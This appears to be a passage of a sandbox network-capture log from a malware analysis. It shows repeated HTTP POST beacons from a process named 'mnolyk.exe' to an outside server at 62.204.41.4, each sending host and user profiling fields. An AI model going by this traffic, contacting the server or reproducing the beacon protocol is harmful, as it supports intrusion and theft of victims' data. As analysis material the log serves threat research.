543	192.168.2.5	50256	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:37.251533985 CET	788	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:37.316498995 CET	788	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
544	192.168.2.5	50257	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:37.493308067 CET	789	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:37.557957888 CET	789	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
545	192.168.2.5	50258	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:37.739912987 CET	790	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:37.803917885 CET	790	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
546	192.168.2.5	50259	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:37.982208967 CET	791	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:38.046180010 CET	791	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
547	192.168.2.5	50260	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:38.219727039 CET	792	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:38.284630060 CET	792	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
548	192.168.2.5	50261	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:38.469324112 CET	793	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:38.533472061 CET	793	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
549	192.168.2.5	50262	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:38.726303101 CET	794	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:38.789239883 CET	794	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.5	49758	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:19.484124899 CET	214	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:19.550895929 CET	215	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
550	192.168.2.5	50263	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:38.967067957 CET	795	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:39.029592991 CET	795	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
551	192.168.2.5	50264	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:39.205303907 CET	796	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:39.271297932 CET	796	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
552	192.168.2.5	50265	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:39.451987982 CET	797	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:39.515446901 CET	797	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
553	192.168.2.5	50266	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:39.687644005 CET	798	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:39.752242088 CET	798	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
554	192.168.2.5	50267	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:39.920444012 CET	799	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:39.982950926 CET	799	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
555	192.168.2.5	50268	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:40.160557032 CET	800	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:40.225560904 CET	800	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
556	192.168.2.5	50269	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:40.413542986 CET	801	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:40.476356983 CET	801	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
557	192.168.2.5	50270	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:40.657860994 CET	802	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:40.720915079 CET	802	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
558	192.168.2.5	50271	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:41.182547092 CET	803	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:41.247157097 CET	803	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
559	192.168.2.5	50272	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:41.450711012 CET	804	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:41.513731956 CET	804	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.5	49760	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:19.749026060 CET	221	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:19.812340021 CET	234	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
560	192.168.2.5	50273	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:41.686868906 CET	805	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:41.751756907 CET	805	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
561	192.168.2.5	50274	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:42.509237051 CET	806	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:42.575639963 CET	806	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
562	192.168.2.5	50275	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:42.829008102 CET	807	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
